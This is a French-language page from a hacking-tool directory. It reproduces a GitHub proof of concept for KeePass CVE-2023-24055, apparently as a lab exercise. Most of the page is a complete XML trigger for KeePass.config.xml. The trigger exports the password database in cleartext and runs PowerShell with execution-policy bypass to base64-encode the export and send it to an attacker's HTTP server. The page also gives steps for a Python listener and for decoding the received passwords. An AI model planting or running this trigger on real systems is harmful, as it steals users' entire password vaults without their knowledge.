Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/zwlsix/keepass-cve-2023-24055
Attaques de Mots de PasseAnalyse des VulnérabilitésExploitationExfiltration de DonnéesApprentissage et ÉducationLabs et Pratique
GitHubzwlsix/keepass-cve-2023-24055

KeePass-CVE-2023-24055

KeePass CVE-2023-24055复现

Voir le dépôt
12il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

KeePass-CVE-2023-24055

Reproduction de KeePass CVE-2023-24055 Reproduction de KeePass CVE-2023-24055

  1. Préparer la machine : kali (192.168.232.129), windows10 (192.168.232.128)

  2. Version de KeePass : 2.53

Image 1

  1. Principe : en modifiant le fichier de configuration KeePass.config.xml, ajouter une configuration de déclencheur : exporter le mot de passe en clair et le télécharger vers le serveur de l'attaquant ; le code XML pour ajouter le déclencheur est le suivant :

Où le champ <Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter> définit le chemin local d'export du mot de passe en clair.

Utiliser PowerShell pour transférer le fichier de mot de passe avec la méthode GET

root@kitploit:~
<Parameter>PowerShell.exe</Parameter>
<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
root@kitploit:~
<Triggers>
				<Trigger>
					<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
					<Name>exploit</Name>
					<Events>
						<Event>
							<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
							<Parameters>
								<Parameter>0</Parameter>
								<Parameter />
							</Parameters>
						</Event>
					</Events>
					<Conditions />
					<Actions>
						<Action>
							<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
							<Parameters>
								<Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter>
								<Parameter>KeePass XML (2.x)</Parameter>
								<Parameter />
								<Parameter />
							</Parameters>
						</Action>
						<Action>
							<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
							<Parameters>
								<Parameter>PowerShell.exe</Parameter>
								<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
								<Parameter>False</Parameter>
								<Parameter>1</Parameter>
								<Parameter />
							</Parameters>
						</Action>
					</Actions>
				</Trigger>
			</Triggers>
  1. Modifier le fichier KeePass.config.xml, ajouter la configuration XML et enregistrer (emplacement d'insertion : à l'intérieur de la balise <TriggerSystem></TriggerSystem>), ouvrir KeePass pour vérifier que l'ajout a réussi :

Image 2

  1. Ouvrir kali, utiliser la commande python3 -m http.server 8888 pour démarrer un serveur web afin de recevoir le mot de passe en clair exporté.

Image 3

  1. Ouvrir KeePass, créer une nouvelle entrée et l'enregistrer. Le déclencheur est activé, vérifier le contenu reçu sur kali :

Image 4

  1. Copier le contenu dans un fichier et le décoder avec base64 pour obtenir le mot de passe en clair.

Image 5

Image 6


Articles de référence : https://github.com/alt3kx/CVE-2023-24055_PoC

https://www.youtube.com/watch?v=tqK1bns51ek

Télécharger l’outil